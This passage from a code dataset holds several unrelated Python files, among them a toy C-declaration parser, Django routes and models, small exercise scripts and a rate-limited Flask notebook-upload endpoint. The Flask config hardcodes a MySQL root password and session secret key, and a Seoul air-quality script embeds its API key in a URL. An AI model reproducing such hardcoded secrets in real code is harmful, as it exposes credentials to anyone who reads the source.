Use .forGranularity() to set one.\"\n )\n\n vr = switcher.get(granularity, \"VGran\")\n return vr\n\n\nclass _NullFillStategy:\n def getUrlParams(self: _NullFillStategy) -> str:\n return \"fillerK=Null\"\n\n\nclass _NoFillStategy:\n def getUrlParams(self: _NoFillStategy) -> str:\n return \"fillerK=NoFill\"\n\n\nclass _FillLatestStategy:\n def __init__(self: _FillLatestStategy, period: str) -> None:\n self.period = period\n\n def getUrlParams(self: _FillLatestStategy) -> str:\n return f\"fillerK=LatestValidValue&fillerP={self.period}\"\n","repo_name":"ARKlab/Artesian.SDK-Python","sub_path":"src/Artesian/Query/VersionedQuery.py","file_name":"VersionedQuery.py","file_ext":"py","file_size_in_byte":17313,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"2894257384","text":"#!/usr/bin/python3\n# -*- coding: UTF-8 -*-\n\nfrom lexer import *\nfrom expression_handler.calculator import Calculator\n\n_ANNOUNCEMENT = 'announcement'\n_INITIALIZE = 'initialize'\n\n_GETITEM = 'getitem'\n_SETITEM = 'setitem'\n_REFERENCE = 'reference'\n\n\nclass Parser:\n\n def __init__(self, lexer) -> None:\n self._lexer = lexer\n self.memory = types_.Memory()\n\n self.token = None\n self.index = None\n\n def _step(self) -> None:\n self._lexer.next_token()\n self.ch = self._lexer.ch\n self.name = self._lexer.name\n self.value = self._lexer.value\n self.token = self._lexer.token\n\n # arr[] = {, , ..., }\n def _parse_array(self, name: str, pointer: bool = False, *, mode: str):\n \"\"\"\n Defines actions with arrays\n \"\"\"\n def define_action(dimension: int):\n if isinstance(dimension, int):\n if mode == _ANNOUNCEMENT:\n self._step()\n return types_.ARRAY(length=value)\n\n elif mode == _GETITEM:\n variable = self.memory.get_by_name(name, throw=True)\n return variable.value[dimension]\n\n elif mode == _SETITEM:\n self._step()\n self.memory.get_by_name(name, throw=True)\n return dimension\n\n elif mode == _REFERENCE:\n start = self.memory.get_by_name(name, throw=True)\n return start.id + dimension\n else:\n raise SyntaxError('Define_action type must be and not ')\n\n if pointer:\n raise SyntaxError('Not implemented feature')\n\n self._step()\n value = self.calculate_expression(stop_tokens=(RSBR,)) # in [...]\n return define_action(value)\n\n def _set_array_elem(self, controller: types_.Controller) -> None:\n controller.setitem(self.calculate_expression(), self.index)\n\n def _array_init(self, controller: types_.Controller) -> None:\n temp_array = []\n if self.token is LBRC:\n self._step()\n while True:\n temp_array.append(self.calculate_expression(stop_tokens=(COMMA, RBRC)))\n if self.token is RBRC:\n break\n self._step()\n\n if controller.length == 0:\n array = types_.ARRAY(length=len(temp_array))\n variable = controller.variable\n\n variable.value = array\n controller = types_.Controller(variable)\n\n elif controller.length >= len(temp_array):\n zeros = [0 for _ in range(controller.length - len(temp_array))]\n temp_array.extend(zeros)\n else:\n raise SyntaxError('Invalid array length')\n\n list(map(lambda element: controller.append(element), temp_array))\n self._step()\n else:\n raise SyntaxError(f'Unacceptable token {self.token}')\n\n def _pointer_init(self):\n if self.token is REFERENCE:\n self._step()\n if self.token is VARIABLE:\n variable = self.memory.get_by_name(self.name, throw=True)\n self._step()\n\n if self.token is SEMICOLON:\n return variable.__class__, variable.id\n\n elif self.token is LSBR:\n id_ = self._parse_array(variable.name, 
variable.pointer, mode=_REFERENCE)\n self._step()\n return variable.__class__, id_\n\n elif self.token is VARIABLE:\n variable = self.memory.get_by_name(self.name, throw=True)\n if variable.pointer:\n self._step()\n return variable.__class__, variable.reference\n else:\n raise SyntaxError(f'<{variable.name}> not a pointer variable')\n else:\n raise SyntaxError(f'Unacceptable token {self.token}')\n\n def _scroller(self, token) -> None:\n while self.token != token:\n self._step()\n if self.token is EOF:\n raise SyntaxError(f'Token not found {token}')\n\n def _expression_parser(self, stop_tokens: tuple):\n expression = Calculator()\n ch = None\n star_flag = None\n\n while True:\n if self.token is VARIABLE:\n name = self.name\n variable = self.memory.get_by_name(name, throw=True)\n\n if isinstance(variable.value, types_.ARRAY):\n self._step()\n if self.token is LSBR:\n expression.token_storage.append(str(self._parse_array(name, mode=_GETITEM)))\n else:\n if variable.pointer:\n if star_flag and ch != ' ':\n expression.token_storage.pop()\n id_ = int(variable.reference)\n value = str(self.memory.get_by_id(id_).value[id_])\n expression.token_storage.append(value)\n else:\n raise SyntaxError('Error in pointer construction')\n else:\n if variable.value is not None:\n expression.token_storage.append(str(variable.value))\n else:\n raise SyntaxError(f'Variable <{name}> not defined')\n\n elif self.token is CONSTANT:\n expression.token_storage.append(str(self.value))\n\n elif self.token is LBR:\n expression.token_storage.append('(')\n\n elif self.token is RBR:\n expression.token_storage.append(')')\n\n elif self.token.__base__ is OPERATOR:\n expression.token_storage.append(self.token.operator)\n if self.token is MUL:\n star_flag = True\n ch = self.ch\n\n elif self.token is QUESTION_MARK:\n stop_tokens = (QUESTION_MARK,)\n\n elif self.token.__base__ is LOGIC:\n expression.token_storage.append(self.token.operator)\n\n elif self.token in stop_tokens:\n break\n\n else:\n raise SyntaxError(f'Unacceptable token {self.token}')\n\n self._step()\n\n return expression, stop_tokens\n\n def calculate_expression(self, stop_tokens=(SEMICOLON,)):\n expression, stop_tokens = self._expression_parser(stop_tokens)\n\n if QUESTION_MARK in stop_tokens:\n if expression.find_value():\n expression, *_ = self._expression_parser(stop_tokens=(COLON,))\n self._scroller(token=SEMICOLON)\n else:\n self._scroller(token=COLON)\n expression, *_ = self._expression_parser(stop_tokens=(SEMICOLON,))\n\n if RSBR in stop_tokens and not expression.token_storage:\n return 0 # to initialize an array of undeclared lengths\n\n return expression.find_value()\n\n def _initializer(self, variable) -> None:\n \"\"\"\n Defines initialization mode\n \"\"\"\n if isinstance(variable.value, types_.ARRAY):\n if self.index is not None:\n self._set_array_elem(types_.Controller(variable))\n else:\n self._array_init(types_.Controller(variable))\n\n elif variable.pointer:\n type_, reference = self._pointer_init()\n if variable.__class__ is not type_:\n raise SyntaxError(f'Different types {variable.__class__} and {type_}')\n variable.reference = reference\n\n else:\n variable.value = self.calculate_expression()\n\n def _constructor(self, name: str, pointer: bool, mode: str) -> None:\n \"\"\"\n Prepares collected data\n \"\"\"\n if self.memory.get_by_name(name) is None:\n if mode == _INITIALIZE:\n raise SyntaxError(f'The variable <{name}> has not been declared')\n\n self._step()\n self.variable = self.type_(name, pointer)\n\n if self.token in (COMMA, SEMICOLON, 
ASSIGNMENT):\n self.memory.append(self.variable)\n\n elif self.token is LSBR:\n array = self._parse_array(name, pointer, mode=mode)\n self.variable.value = array\n self.memory.append(self.variable)\n else:\n if mode == _ANNOUNCEMENT:\n raise SyntaxError(f'Redefinition of <{name}>')\n\n self.variable = self.memory.last_viewed\n self._step()\n\n if self.token not in (ASSIGNMENT, LSBR):\n raise SyntaxError(f'Unacceptable token {self.token}')\n elif self.token is LSBR:\n self.index = self._parse_array(name, pointer, mode=_SETITEM)\n\n def _classifier(self, mode: str) -> None:\n \"\"\"\n Defines a part: *var or var\n \"\"\"\n if mode == _ANNOUNCEMENT:\n self._step()\n\n if self.token is MUL:\n self._step()\n if self.token is VARIABLE:\n self._constructor(name=self.name, pointer=True, mode=mode)\n\n elif self.token is VARIABLE:\n self._constructor(name=self.name, pointer=False, mode=mode)\n\n def _determinator(self, mode: str) -> None:\n \"\"\"\n Determines the next step by set mode\n\n Modes: _ANNOUNCEMENT, _INITIALIZE\n\n In _ANNOUNCEMENT parses lines similar to:\n * type var1, *var2, var3[], ...;\n\n In _INITIALIZE parses lines similar to:\n * type var = ...;\n * type var[] = ...;\n After the assignment operator, control passes to the initializer,\n which parses the expression in accordance with the declaration\n \"\"\"\n if mode == _ANNOUNCEMENT:\n self.type_ = self.token\n\n self._classifier(mode)\n if self.token is ASSIGNMENT:\n self._step()\n self._initializer(self.variable)\n else:\n if mode == _ANNOUNCEMENT:\n while self.token is not SEMICOLON:\n if self.token is COMMA:\n self._step()\n self._classifier(mode)\n else:\n raise SyntaxError('You cannot initialize more than one variable in a declaration line')\n\n def parse(self) -> None:\n self._step()\n while self.token != EOF:\n if self.token in Lexer.TYPES.values():\n self._determinator(mode=_ANNOUNCEMENT)\n else:\n self._determinator(mode=_INITIALIZE)\n\n self._step()\n\n\nif __name__ == '__main__':\n L = Lexer('int a [] = {77 -(91*2)/3, 5}; int *q = &a[1]; a[0] = *q + 2;')\n p = Parser(L)\n p.parse()\n print(p.memory)\n\n L1 = Lexer('int a[] = {77 -(91*2)/3}; int c = 33;')\n p1 = Parser(L1)\n p1.parse()\n print(p1.memory)\n\n L2 = Lexer('int a[4] = {7 - 99*2- (88/3),3, 566.2, 4554-888};')\n p2 = Parser(L2)\n p2.parse()\n print(p2.memory)","repo_name":"kenplix/micro-C-parser","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":11112,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"25840597597","text":"\"\"\"StudentEnrollment URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.urls import path\n\nfrom base.views import(\n\n dashboard,\n req2,\n req3,\n req4,\n req5,\n req6,\n req7,\n registerPage,\n loginPage,\n logoutUser,\n)\n\nurlpatterns = [\n path('register/', registerPage, name=\"register\"),\n path('login/', loginPage, name=\"login\"),\n path('logout/', logoutUser, name=\"logout\"),\n\n path('admin/', admin.site.urls),\n path('', dashboard, name='home'),\n path('req2/', req2, name='req2'),\n path('req3/', req3, name='req3'),\n path('req4/', req4, name='req4'),\n path('req5/', req5, name='req5'),\n path('req6/', req6, name='req6'),\n path('req7/', req7, name='req7'),\n #path('input/', inputPage, name='input'),\n # path('input/', simple_upload, name='upload')\n]\n\nif settings.DEBUG:\n urlpatterns+=static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n urlpatterns+=static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n \n","repo_name":"Rayhan-Farhan/student-enrollment-analysis","sub_path":"StudentEnrollment/StudentEnrollment/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"30277236119","text":"import os\n\n\nclass DefaultConfig(object):\n\n BASE_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), '../..'))\n\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n\n # session 使用\n SECRET_KEY = '\\xf9\\xfb\\xdfIb\\xb4\\x0f\\xab\\xf1\\xc9P\\x97\\xc5\\xd4X\"\\x8ag\\xa8\\xd0\\xe8|8\\xcc'\n DEBUG = True\n # 注册mysql\n SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:rock1204@localhost/mono'\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"colorfulComeMonochrome/myproject","sub_path":"mono/mono/config/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"7540796683","text":"\"\"\"\nFaça um Programa que leia 4 notas, mostre as notas e a média na tela.\n\"\"\"\nnotas = []\nfor i in range(4):\n notas.append(float(input('Digite uma nota: ')))\n\nmedia = sum(notas) / len(notas)\nfor i in notas:\n print(f'Notas: {i}')\nprint(f'Média: {media:.2f}')","repo_name":"VictorM20/ListaDeExercicios","sub_path":"ExerciciosListas/Exercicio3.py","file_name":"Exercicio3.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"26472597132","text":"#!/usr/bin/python3\n\nimport os, sys, glob, ROOT, logging, subprocess\nfrom HiggsAnalysis.CombinedLimit.DatacardParser import *\n\nws = os.environ['WS']\nwd = ws+'/validation'\nwdir = wd+'/cards/combine/pyhf2combine'\n\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%m-%d %H:%M',\n filename=ws+'/logs/validateCombine.log',\n filemode='w')\nconsole = logging.StreamHandler()\nconsole.setLevel(logging.INFO)\nformatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\nconsole.setFormatter(formatter)\nlogging.getLogger().addHandler(console)\n\nlogging.info('Start validation process for combine card conversion')\ncomblog = logging.getLogger('convert.combine.validate')\n\ndef compareCards(lh, rh):\n if isinstance(lh, list):\n lh.sort()\n rh.sort()\n return True if lh == rh else False\n elif 
isinstance(lh, dict):\n shared = {k: lh[k] for k in lh if k in rh and lh[k] == rh[k]}\n return True if len(shared) == len(lh.items()) else False\n elif isinstance(lh, set):\n diff = lh.difference(rh)\n return not bool(diff)\n return False\n\ndef compareShapes(lh, rh):\n hists = []\n for hname in lh.keys():\n if rh[hname].Integral() > 0 and abs(lh[hname].Integral()-rh[hname].Integral())/rh[hname].Integral() > 1E-4:\n print(hname, lh[hname].Integral(), rh[hname].Integral())\n hists.append(hname)\n else:\n for b in range(1, lh[hname].GetXaxis().GetNbins()+1):\n if rh[hname].GetBinContent(b) > 1E-10 and abs(lh[hname].GetBinContent(b)-rh[hname].GetBinContent(b))/rh[hname].GetBinContent(b) > 1E-4:\n hists.append(hname)\n break\n return hists\n\nopts = type(\"opts\", (object,), dict(bin=True, noJMax=False, stat=False, nuisancesToExclude=[], allowNoSignal=True, allowNoBackground=True))\n\nruns = glob.glob(wdir+'/*/')\nfor r in runs:\n runName = r.split('/')[-2]\n fcv = glob.glob(wdir+'/'+runName+'/*.txt')\n comblog.info('Validate '+runName+' (combine)')\n\n for f in fcv:\n forig = f.replace('validation/', '').replace('pyhf2combine/', '')\n with open(f, 'r') as fdv:\n dcv = parseCard(fdv, opts)\n with open(forig, 'r') as fdo:\n dco = parseCard(fdo, opts)\n comblog.info('--> Compare datacards: '+os.path.splitext(forig.split('/')[-1])[0])\n res = {}\n res['bins'] = [compareCards(dco.bins, dcv.bins), dco.bins, dcv.bins]\n res['obs'] = [compareCards(dco.obs, dcv.obs), dco.obs, dcv.obs]\n res['processes'] = [compareCards(dco.processes, dcv.processes), dco.processes, dcv.processes]\n res['signals'] = [compareCards(dco.signals, dcv.signals), dco.signals, dcv.signals]\n res['isSignal'] = [compareCards(dco.isSignal, dcv.isSignal), dco.isSignal, dcv.isSignal]\n res['keyline'] = [compareCards(dco.keyline, dcv.keyline), dco.keyline, dcv.keyline]\n res['exp'] = [compareCards(dco.exp, dcv.exp), dco.exp, dcv.exp]\n res['systs'] = [compareCards(dco.systs, dcv.systs), dco.systs, dcv.systs]\n# res['shapeMap'] = [compareCards(dco.shapeMap, dcv.shapeMap), dco.shapeMap, dcv.shapeMap] # run an explicit comparison of shapes below\n res['flatParamNuisances'] = [compareCards(dco.flatParamNuisances, dcv.flatParamNuisances), dco.flatParamNuisances, dcv.flatParamNuisances]\n res['rateParams'] = [compareCards(dco.rateParams, dcv.rateParams), dco.rateParams, dcv.rateParams]\n res['extArgs'] = [compareCards(dco.extArgs, dcv.extArgs), dco.extArgs, dcv.extArgs]\n res['rateParamsOrder'] = [compareCards(dco.rateParamsOrder, dcv.rateParamsOrder), dco.rateParamsOrder, dcv.rateParamsOrder]\n res['frozenNuisances'] = [compareCards(dco.frozenNuisances, dcv.frozenNuisances), dco.frozenNuisances, dcv.frozenNuisances]\n \n passedCard = True\n for k in res.keys():\n if not res[k][0]:\n comblog.error('Datacard comparison failed for '+k+':')\n print('Original:', res[k][1])\n print('Converted:', res[k][2])\n passedCard = False\n \n if passedCard:\n comblog.info('--> Compare datacards: \\033[1;32mpassed\\x1b[0m')\n comblog.info('--> Compare shapes: '+os.path.splitext(forig.split('/')[-1])[0])\n histso, histsv = {}, {}\n for b in dco.shapeMap.keys():\n for p in dco.shapeMap[b].keys():\n rfileo = dco.shapeMap[b][p][0]\n rfilev = dcv.shapeMap[b][p][0]\n rfo = ROOT.TFile(wdir.replace('validation/', '').replace('pyhf2combine', '')+'/'+runName+'/'+rfileo, 'READ')\n rfv = ROOT.TFile(rfilev, 'READ')\n nomo = dco.shapeMap[b][p][1]\n nomv = dcv.shapeMap[b][p][1]\n syso = dco.shapeMap[b][p][2]\n sysv = dcv.shapeMap[b][p][2]\n systNames = [s[0] for s in 
dco.systs]\n for proc in dco.processes:\n for syst in ['']+systNames:\n if syst == '':\n nomName = nomo.replace('$PROCESS', proc)\n if not rfo.GetListOfKeys().Contains(nomName): continue\n histso[b+'_'+proc] = rfo.Get(nomName).Clone(b+'_'+proc+'_original')\n histso[b+'_'+proc].SetDirectory(0)\n nomName = nomv.replace('$PROCESS', proc)\n if not rfv.Get(nomName):\n comblog.error('Missing histogram in the converted file: '+nomName)\n continue\n histsv[b+'_'+proc] = rfv.Get(nomName).Clone(b+'_'+proc+'_converted')\n histsv[b+'_'+proc].SetDirectory(0)\n else:\n for var in ['Up', 'Down']:\n systName = syso.replace('$PROCESS', proc).replace('$SYSTEMATIC', syst+var)\n if not rfo.GetListOfKeys().Contains(systName): continue\n histso[b+'_'+proc+'_'+syst+var] = rfo.Get(systName).Clone(systName+'_original')\n histso[b+'_'+proc+'_'+syst+var].SetDirectory(0)\n systName = sysv.replace('$PROCESS', proc).replace('$SYSTEMATIC', syst+var)\n if not rfv.Get(systName):\n comblog.error('Missing histogram in the converted file: '+systName)\n continue\n histsv[b+'_'+proc+'_'+syst+var] = rfv.Get(systName).Clone(systName+'_converted')\n histsv[b+'_'+proc+'_'+syst+var].SetDirectory(0)\n\n hists = compareShapes(histso, histsv)\n \n if not hists:\n comblog.info('--> Compare shapes: \\033[1;32mpassed\\x1b[0m')\n else:\n comblog.info('--> Compare shapes: \\033[1;31mfailed\\x1b[0m')\n for h in hists:\n nbins = histso[h].GetXaxis().GetNbins()\n comblog.error('--> Original shape ('+h+'):')\n for b in range(1, nbins+1):\n comblog.error('bin #'+str(b)+': '+str(histso[h].GetBinContent(b))+'+-'+str(histso[h].GetBinError(b)))\n comblog.error('--> Converted shape ('+h+'):')\n for b in range(1, nbins+1):\n comblog.error('bin #'+str(b)+': '+str(histsv[h].GetBinContent(b))+'+-'+str(histsv[h].GetBinError(b)))","repo_name":"kskovpen/combine2pyhf","sub_path":"converter/validateCombine.py","file_name":"validateCombine.py","file_ext":"py","file_size_in_byte":7863,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"20"} +{"seq_id":"27386476124","text":"items = input().split()\ninventory = {items[i]: int(items[i + 1]) for i in range(0, len(items), 2)}\n\nitems_to_search = input().split()\n\nfor item in items_to_search:\n if item in inventory:\n print(f\"We have {inventory.get(item)} of {item} left\")\n else:\n print(f\"Sorry, we don't have {item}\")\n","repo_name":"SashkoIT/SoftUni-Software-Engineering","sub_path":"SoftUni Homework/Programming Fundamentals with Python/09. Dictionaries/02. Stock.py","file_name":"02. Stock.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"22609280912","text":"import sys\nimport os.path\nimport imp\n\n\nfrozen = getattr(sys, 'frozen', None)\nour_path = os.path.realpath(os.path.split(__file__)[0])\n\n\ndef exists(module_name):\n '''\n Return whether a module by the name `module_name` exists.\n \n This seems to be the best way to carefully import a module.\n \n Currently implemented for top-level packages only. (i.e. no dots.)\n \n Doesn't support modules imported from a zip file.\n '''\n assert '.' 
not in module_name\n try:\n imp.find_module(module_name)\n except ImportError:\n return False\n else:\n return True\n\n\ndef prepare_zip_testing(package_names):\n '''Zip all GarlicSim modules and import them for testing.'''\n \n sys.stdout.write('Preparing to zip GarlicSim packages, and then run tests '\n 'with GarlicSim imported from zip files.\\n')\n \n assert not frozen\n\n command_for_making_zip = '\"%s\" \"%s\"' % (\n sys.executable,\n os.path.realpath(os.path.join(our_path, 'make_zip.py')),\n )\n \n if os.name == 'nt': # Conforming to weird Windows standards:\n command_for_making_zip = '\"%s\"' % command_for_making_zip\n \n result = os.system(command_for_making_zip)\n \n if result != 0:\n exit(result)\n \n for package_name in package_names:\n assert not exists(package_name)\n assert package_name not in sys.modules\n\n sys.stdout.write('Importing all GarlicSim packages from zip files... ')\n \n for i, package_name in enumerate(package_names):\n zip_file = os.path.realpath(\n os.path.join(our_path, 'build', (str(i) + '.zip'))\n )\n assert zip_file not in sys.path\n sys.path.append(zip_file)\n package = __import__(package_name)\n assert '.zip' in package.__file__\n \n sys.stdout.write('Done.\\n')\n \n \ndef ensure_zip_testing_was_legit(package_names):\n '''\n Ensure GarlicSim packages were indeed used from zip.\n \n This is used only in `--from-zip` testing, to ensure that the GarlicSim\n packages weren't used from the source folders accidentally.\n '''\n sys.stdout.write('Confirming all GarlicSim packages were used from zip '\n 'files... ')\n for i, package_name in enumerate(package_names):\n assert package_name in sys.modules\n package = sys.modules[package_name]\n assert '.zip' in package.__file__\n \n raw_module_names = \\\n [module_name for module_name in sys.modules.keys() if\n module_name.split('.')[0] == package_name]\n \n # Filtering out module names that map to `None`, because of a bug,\n # probably in `zipimport`, which litters `sys.modules` with\n # non-sense modules:\n \n module_names = [module_name for module_name in raw_module_names if\n sys.modules[module_name] is not None]\n \n module_paths = [sys.modules[module_name].__file__ for\n module_name in module_names]\n \n zip_file_name = str(i) + '.zip'\n snippet_from_real_folder_path = \\\n os.path.sep.join((package_name, package_name))\n for module_path in module_paths:\n assert zip_file_name in module_path\n assert snippet_from_real_folder_path not in module_path\n sys.stdout.write('Done.\\n')","repo_name":"cool-RR/GarlicSim","sub_path":"misc/testing/zip/testing_utilities.py","file_name":"testing_utilities.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"20"} +{"seq_id":"9141112742","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 4 10:17:49 2017\n\n@author: Ruby Kumar\nEXCERCISE: for statements\n\"\"\"\n# Measure some strings\nwords = ['cat', 'monkey', 'human', 'bananas']\nfor word in words:\n print(word, len(word))\n# loop over a slice copy of the entire list (slice any word\n#from the list and put it where you like inside the list; insert()\n\nfor word in words[:]:\n if len(word) > 6:\n words.insert(0, word)\n print(words)\n ","repo_name":"rubykumar1/python-creations","sub_path":"for_loop.py","file_name":"for_loop.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"18411971612","text":"# import requests\n# res = 
requests.get(\"http://www.naver.com\")\n# print(\"응답코드 :\", res.status_code) # 200이면 정상 접근, 304이면 접근 권한이 없음\n\nimport requests # requests 라이브러리 설치 필요\n\nr = requests.get('http://openapi.seoul.go.kr:8088/6d4d776b466c656533356a4b4b5872/json/RealtimeCityAir/1/99')\nrjson = r.json()\n\n# print(rjson['RealtimeCityAir']['row'][0]['MSRSTE_NM'])\n\ngus =rjson['RealtimeCityAir']['row']\n\nfor gu in gus :\n gu_name = gu['MSRSTE_NM']\n gu_mise = gu['IDEX_MVL']\n if gu_mise < 100: #100보다 작은거\n print(gu_name,gu_mise)","repo_name":"gojong/spartacoding","sub_path":"week03/3-7.py","file_name":"3-7.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"34242347409","text":"from django.db import models\nfrom place import Place\nimport extsea\nimport rpgdb\n\nclass Character(models.Model):\n\t'''Character class for django'''\n\tname = models.CharField(max_length=50, primary_key=True)\n\tpassword = models.CharField(max_length=100)\n\tplace = models.ForeignKey(Place)\n\tavailable = models.DateTimeField()\n\tclass Meta:\n\t\tapp_label = 'kovin'\n\tdef __unicode__(self):\n\t\treturn self.name\n\tdef to_extsea(self):\n\t\t'''Convert django model into character from extsea module'''\n\t\tcharacter = extsea.Character(self.name)\n\t\tfor attribute in Attribute.objects.filter(owner = self, disabled = False):\n\t\t\tcharacter.add(attribute.to_extsea())\n\t\tcharacter.fight = rpgdb.ai_custom\n\t\treturn character\n\t@staticmethod\n\tdef from_extsea(character):\n\t\t'''Create django model from extsea character'''\n\t\tresult = Character.objects.filter(name=character.name)\n\t\tif len(result) > 0:\n\t\t\tcharacter_model = result[0]\n\t\telse:\n\t\t\tcharacter_model = Character()\n\t\t\tcharacter_model.name = character.name\n\t\tfor i in character.attrib:\n\t\t\tattribute = Attribute.from_extsea(character.attrib[i])\n\t\t\tattribute.owner_id = character_model\n\t\t\tattribute.save()\n\t\treturn character_model\n\n\nclass Attribute(models.Model):\n\t'''Single attribute'''\n\tname = models.CharField(max_length=50)\n\towner = models.ForeignKey(Character)\n\tlevel = models.IntegerField()\n\texp = models.DecimalField(max_digits=10, decimal_places=2)\n\tdisabled = models.BooleanField()\n\tclass Meta:\n\t\tapp_label = 'kovin'\n\tdef __unicode__(self):\n\t\treturn self.name + '@' + self.owner.name\n\tdef to_extsea(self):\n\t\t'''Convert into extsea class'''\n\t\tattribute = rpgdb.createl(self.name, self.level)\n\t\tattribute.id = self.id\n\t\tattribute.rlevel = attribute.level\n\t\tattribute.exp = self.exp\n\t\treturn attribute\n\t@staticmethod\n\tdef from_extsea(attribute):\n\t\t'''Create new model from extsea object'''\n\t\tif hasattr(attribute, 'id'):\n\t\t\tattribute_model = Attribute.objects.get(id=attribute.id)\n\t\telse:\n\t\t\tattribute_model = Attribute()\n\t\tattribute_model.name = attribute.name\n\t\tattribute_model.level = attribute.rlevel\n\t\tattribute_model.exp = str(attribute.exp)\n\t\treturn attribute_model\n","repo_name":"szatkus/kovin","sub_path":"models/character.py","file_name":"character.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"15473988581","text":"from flask import Flask, request, jsonify\nimport hashlib, tempfile, time, os, shutil, glob, collections\n\napp = Flask(__name__)\n# Set the maximum content length to 4MB\napp.config['MAX_CONTENT_LENGTH'] = 4 * 1024 * 1024\n# Set the disk space miniumum 
to 256MB\napp.config['MIN_DISK_SPACE'] = 256 * 1024 * 1024\n\n# Specify the directory where uploaded files will be saved\napp.config['UPLOAD_FOLDER'] = os.path.join(os.getcwd(), 'uploads')\n\n# Throttling rate limit\napp.config['UPLOAD_LIMIT'] = 64 * 1024 * 1024 # MB per day\n\n\n# Implements OpenAPI 3.0.3 /upload/ipynb endpoint\n@app.route('/upload/ipynb', methods=['POST'])\ndef upload_ipynb():\n content_length = request.content_length\n if content_length is None or content_length > app.config['MAX_CONTENT_LENGTH']:\n return jsonify({'status': 'error', 'message': 'File size exceeds maximum allowed'}), 413\n \n # Get client IP address from X-Forwarded-For header\n if request.headers.getlist(\"X-Forwarded-For\"):\n client_ip = request.headers.getlist(\"X-Forwarded-For\")[0]\n else:\n client_ip = request.remote_addr\n \n # Create a temporary file to save the uploaded chunks\n temp_file = tempfile.NamedTemporaryFile(delete=True)\n\n # Check if the temporary file was created successfully and return an error if not\n if temp_file is None:\n return jsonify({'status': 'error', 'message': 'Failed to process the request'}), 500\n \n # Check if there is enough disk space to save the file\n if shutil.disk_usage(app.config['UPLOAD_FOLDER']).free < app.config['MIN_DISK_SPACE']:\n return jsonify({'status': 'error', 'message': 'Failed to process the request'}), 500\n\n if shutil.disk_usage(temp_file.name).free < app.config['MIN_DISK_SPACE']:\n return jsonify({'status': 'error', 'message': 'Failed to process the request'}), 500\n\n # Define a path UPLOAD_FOLDER/IP/today's date, if doesn't exists, create it\n # If exists, check disk usage for that folder if it is larger than UPLOAD_LIMIT, return error\n new_folder_path = os.path.join(app.config['UPLOAD_FOLDER'], f'{client_ip}', f'{time.strftime(\"%Y-%m-%d\")}')\n if not os.path.exists(new_folder_path):\n os.makedirs(new_folder_path, exist_ok=True)\n else:\n if shutil.disk_usage(new_folder_path).used > app.config['UPLOAD_LIMIT']:\n return jsonify({'status': 'error', 'message': 'Too many requests, please try again later'}), 429 \n\n # Process file upload in chunks\n chunk_size = 4096\n file_hash = hashlib.md5()\n while True:\n chunk = request.stream.read(chunk_size)\n if not chunk:\n break\n\n # Check of temporary file size exceeds maximum allowed\n if temp_file.tell() + len(chunk) > app.config['MAX_CONTENT_LENGTH']:\n return jsonify({'status': 'error', 'message': 'File size exceeds maximum allowed'}), 413\n\n # Calculate file hash in chunks and write to temporary file\n file_hash.update(chunk)\n temp_file.write(chunk)\n\n # Check if there is enough disk space to save the file\n if shutil.disk_usage(app.config['UPLOAD_FOLDER']).free < app.config['MIN_DISK_SPACE']:\n return jsonify({'status': 'error', 'message': 'Failed to process the request'}), 500\n\n # Flush temporary file to disk\n temp_file.flush()\n\n # Resolve file path and name\n file_hash = file_hash.hexdigest()\n new_file_path = os.path.join(new_folder_path, f'{file_hash}')\n\n # check if the duplicate data that starts with the same same hash already exists\n if glob.glob(f'{new_file_path}*'):\n return jsonify({'status': 'error', 'message': 'Failed to process the request'}), 500\n\n # Copy temporary file into permanent storage, include file hash and timestamp\n new_file_name = f'{new_file_path}.{client_ip}.{int(time.time())}.ipynb'\n shutil.copy(temp_file.name, new_file_name)\n\n # Close temporary file which will delete it\n temp_file.close()\n\n # File upload complete, return success response\n 
